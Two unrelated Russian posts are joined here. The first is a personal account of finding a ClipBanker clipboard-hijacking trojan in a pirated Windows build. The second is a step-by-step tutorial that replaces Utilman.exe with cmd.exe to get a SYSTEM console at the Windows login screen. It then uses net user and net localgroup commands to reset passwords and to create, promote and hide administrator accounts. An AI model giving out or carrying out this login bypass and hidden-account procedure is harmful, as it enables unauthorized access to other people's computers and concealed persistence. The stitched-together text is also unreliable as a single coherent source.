Выбрал наиболее подходящий мне способ вывода (если кому интересны комиссии, и прочая лабуда могу рассказать). Таким оказался вывод через криптобиржу и далее на карту, после чего уже можно наконец пойти до ближайшего продуктового.

И так наши основные действующие лица, которые понадобятся для повествования:

Криптобиржа - одна из самых известных, но это вовсе не значит, что она норм.

Блокчейн кошелёк - blockchain.com, здесь объяснять нечего, теперь у каждой псины он есть.

Windows 10 pro - как не странно, конечно же пиратская - вы в своём уме? откуда у меня деньги на лицензию, варёную колбасу то по праздникам ем!

Антагонист - человек не обременённый моральными принципами и готовый мать продать за Nike Air.

Далее повествование пойдёт как в аниме триллере - смазано, скучно и ничего непонятно, поэтому заканчивай читать лучше здесь.

Зарегался на криптобирже, открыл там счёт своего BTC кошелька, чтобы перевести туда свои деньги и далее обменять на доллары по биржевому курсу.

Нужно всего лишь указать адрес своего сгенерированного кошелька на blockchain.com при отправке биткоина. Тот, что на картинке по понятным причинам изменён. Казалось бы, что может пойти не так…

Как холёный хомяк копирую в буфер обмена (запомните эти слова далее они нам не пригодятся пригодятся) сгенерированный кошелёк на криптобирже.

Иду на blockchain.com.

Вставляю из буфера обмена в адрес отправления и уже готовый нажать send по-своему бумерскому обычаю решаю проверить что за адрес то скопировался, параноик, и тут замечаю, что адрес совсем чуть-чуть ПОЛНОСТЬЮ БЛЯТЬ ОТЛИЧАЕТСЯ от того, что сгенерировал выше.

Подметив неладное и решив, что дело во мне, проделываю данную процедуру ещё несколько раз, в блокнот, sublime, chrome, разве только что в жопу (за мат извените) себе не вставив, понимаю, что ничего не понимаю.

Опять грешу на свою же необразованность и лезу разбираться вдруг там какая защищенная пара кошельков генерится и т.д., - в общем нет, всё работает максимально топорно, что сгенерировали туда и отправишь.

Для тех, кто уже полностью потерял связь с реальностью, немного треш-визуализации:

Хммм, подумал я и решил, что заниматься этим в 5 утра уже как-то комильфо. Поделился с другом на следующий день, после чего перешли непосредственно к самому интересному:

Как мой юный крипточитатель уже догадался - кто-то или что-то подменяет буфер обмена.

По абсолютно бесплатному и профессиональному совету, пошёл в автозагрузки и начал проверять что там у меня крутится такого недоверенного, что можно бы проверить на вирусы к примеру.

Благо рассказчик ваш пират со стажем, и поэтому Window 10 pro просто хрипит от крайне сомнительно-подозрительно софта, установленного за время пользования пекарней.

Ну да пёс с ним, пойду проверять по одному - первый выстрел, просто программа активации ключей, ничего такого, всё спокойно, идём дальше, следующий - какой-то flex сервер solid works, но кроме троянов, ничего плохого, оставляем, пусть крутится, ботнет то сам работать не будет.

Крутанул барабан ещё и смотрю вот это, что за зверь:

Запомните путь к папке, далее он нам также не понадобится.

Пытаюсь провалиться в папку. Хмм, странно доступ закрыт, ничего не прочитать, ладно хорошо хоть admin может права поменять у папки в Винде, спасибо Билл удружил, в следующий раз куплю, обещаю.

Поменял, захожу, смотрю какой-то файл непонятный, кидаю на Virus Total и нахожу вот это (файл к тому же был первый раз на Virus Total, с почином):

К слову, обладателям антивирусов, которые показали, что всё красиво, подмечаю что таковыми они не являются, будьте осторожны дамы и господа, и прочие вертолёты.

Троян, троян, понятно, но интересует нас вот это - "СlipBanker". Ага, попался.

Для тех, кто учил японский - "обрезание банкира", по-нашему. Вкрации взлом жопы буфера обмена.

Думаю, ок, пойду в планировщик задач, нахожу его там:

Решаю, надо проверить, делаю тест с включённой задачей - подмена в буфере обмена, всё чётко, красиво.

Выключаю в планировщике - и оооооп, ну надо же теперь всё копируется как должно.

Мразь, паскуда, нашёлся. Хорош, иду смотреть сам файл - благо .jar, можно деобфусцировать, слову друг научил, умный он очень.

Открыл в редакторе и увидел, прозрел, узнал и согласился сразу со всем.

Список файлов и вот ну надо же в одном из них прямо захардкожен кошелёк злоумышленника.

Да не один, и под Etherium и другую криптовалюту и названы как романтично заметьте.

Таким образом софтина подменяет содержимое буфера обмена на адрес кошелька злоумышленника если я копирую какой-либо свой криптокошелёк.

Всё ясно, теперь понимаю, иду обратно в планировщик понять попытаться откуда файл и как появился. Но благо здесь всё оказалось просто, задача автоматически была поставлена через 3 минуты после успешной установки винды, и будь ваш слуга хоть флешем или под флешем всё равно не успел бы залезть и скачать какие-либо мокрые программы за эти 3 минуты.

Но научившись у берлинского пациента, просто так сам с собой не соглашаюсь и решаю, что нужно перепроверить факты. Как же так, быть не может, может быть всё неправда, где чистота эксперимента? Вот же она, здесь:

Иду искать откуда раздачу скачивал, нахожу по истории в nnm-club.to.

Устанавливаю на виртуалку эту же Винду, что и сам использую, прости меня Билл.

Проводим проверку - тот же файл лежит там же, и буфер работает также - с подменой. Винда чистая. Грусть печаль, потеря настроения и частички себя, как же так, пиратская винда с вирусами, никогда бы не подумал, никогда не было и вот опять!

Проверяю чувака, который выложил раздачу, читаю всё. В комментах в основном - как же всё здорово и быстро, и лучше только бутерброд по утру. Иду проверять остальные раздачи его же, читаю все комменты узнаю как зовут домашних животных и кто пользуется зубной пастой с травами, нахожу в 2х раздачах подводящие вопросы - на что ответ в стиле к которому мы привыкли в стране - показалось, не было такого.

И вот:

Ахах, насмешил, красавчик, уважаю. Путь к файлу везде одинаковый, конечная папка только отличается. Ленивый, жалко. Раздач у него около 10.

Понимаю чувак - Антагонист добра. Почему чувак - послушайте Карлина. Прошу заметить в каждой раздаче файл назван по-разному, шифруется, молодец, хвалю. Иду проверять насколько наш парень успешен. Благо крипта, можно проверить все транзакции, получил пока что 200 долларов.

Но это только с этой раздачи и только с BTC.

Далее встаю в тупик, так что, если кто подскажет как вычислить его по IP и устроить показательный 120 часовой просмотр  Джо-Джо чтобы сделать из него наконец человека - тому мои обнимашки и целовашки.

Но если есть ещё один шанс, и я полностью не прав - представься создатель будь добр тогда. Объясни откуда брал раздачи и спасём же мы наше криптонаселение.

Хорошего дня, смотрите что качаете или по крайней мере проверяйте что вставляете)

P.S. Бутерброд с сыром съел, фото не вставлю, за мат извените.

Кратко о том, что находится на видео:

1) Вы включаете компьютер и несколько раз перезагружаете его в момент запуска Windows. (Для этого нужно нажать на специальную кнопку на стационарном ПК или около 5 секунд удерживать кнопку включения на Ноутбуке)

2) Запустится утилита автоматического восстановления. Ждём завершения. Выбираем "дополнительно" - "Поиск и устранение неисправностей" - "Дополнительно" - "Командная строка".

В открывшейся консоли вбиваем:

1)C:

2)cd windows

3)cd system32 (какая папка system в 64-x версии я не знаю)

4)ren Utilman.exe Utilmanorig.exe (название можете сделать любое)

5)copy cmd.exe Utilman.exe

6)Перезагружаем компьютер

3)Нажимаем на кнопку специальных возможностей

4)В открывшейся консоли вбиваем:

net user *имя_пользователя* *пароль*

(Имя пользователя не длинее 20 символов. Если в имени присутствуют пробелы пишем в начале и конце имени "

Например: net user "Admin the king" 1234567890)

Готово!

А теперь к особенностям данной уязвимости.

1) Такое возможно из-за того, что мы открываем консоль от имени Системы. Вбив в консоль taskmgr (Диспетчер задач) в "Подробности" вы сможете увидеть, что любой запущенный вами процесс имеет приписку о том, что он запущен пользователем "SYSTEM".

2) При попытке открыть explorer у вас появится панель Пуск, однако нормальное взаимодействие происходит только со списком открытых приложений. Открыть проводник или меню пуск вы так и не сможете. Среди открытых приложений будет Winlogon.exe, однако он никак не реагирует на попытку закрыть его или "Свернуть все окна".

3)При попытке закрыть процесс входа в систему (winlogon.exe) он откроется заново. При "завершить дерево процессов" через resmon происходит тоже самое.

4) При открытии Steam я смог войти в аккаунт и увидеть свой баланс, однако библиотека, магазин, инвентарь и т.д. просто не загружались. Дополнительные окна (настройки, музыкальный плеер) не открывались. Хотя сама музыка вполне проигрывалась. (Я не проверял Offline-мод и не пытался запустить игры через ярлыки)

P.S. При первом запуске будет английский язык. Просто войдите в аккаунт и перезагрузите Steam.

5) Undertale (пиратка) - работает! Однако, так как сохранения хранятся в папке пользователя... Да и возможность сохранятся я так и не проверил. (Однако, учитывая то, что Steam смог сохранить данные об аккаунте, скорее всего сохранения работают нормально)

6) Открыв notepad и выбрав "Открыть" или "Сохранить как" вы сможете более менее воспользоватся проводником. Файлы надо открывать через правую кнопку мыши.

7)Открытый диспетчер задач (taskmgr) сильно конфликтует с 6 особенностью.

А теперь самая главная особенность данной уязвимости!

Вбив в консоль net user *имя_пользователя* /add вы добавите нового пользователя, который имеет лишь обычные права пользователя. Однако...

net localgroup Пользователь /delete *имя_пользователя*

net localgroup Администратор /add *имя_пользователя*

В моём случае ещё был net localgroup "Debugger users" /add *имя_пользователя*

Полный список подобных групп net localgroup.

Узнать подробности группы net localgroup *название_группы* (если в названии есть пробелы, то надо писать его в ""

Например: net localgroup "Администратор Hyper-V" (и такое там есть...) /add *имя_пользователя*

В случае, если новый аккаунт не отображается после перезагрузки компьютера нужно активировать его net user *имя_пользователя* /active:yes

Чтобы спрятать аккаунт (деативировать его) net user *имя_пользователя* /active:no

Чтобы поставить пароль net user *имя_пользователя* *пароль*

Чтобы удалить аккаунт net user *имя_рользователя* /delete

Если ввести net user *имя_пользователя* * то вам предложат ввести пароль. Это ничего не даёт и скорее всего служит лишь для быстрой проверки пароля.

Подробнее можно узнать вбив net user /help

Список аккаунтов на ПК net user

Подробности аккаунта net user *имя_пользователя*

Если скрыть папку пользователя через "Свойства" и деактивировать (спрятать) аккаунт, то о новом пользователе можно будет узнать только либо через "отображение скрытых папок и файлов" или net user.

Такая уязвимость очень опасна, однако её не исправляют... Я даже не знаю - это лень или реально трудно это исправить? Или возможность открыть консоль в случае заражения ПК вирусом или при проблемах установки Windows действительно настолько важна?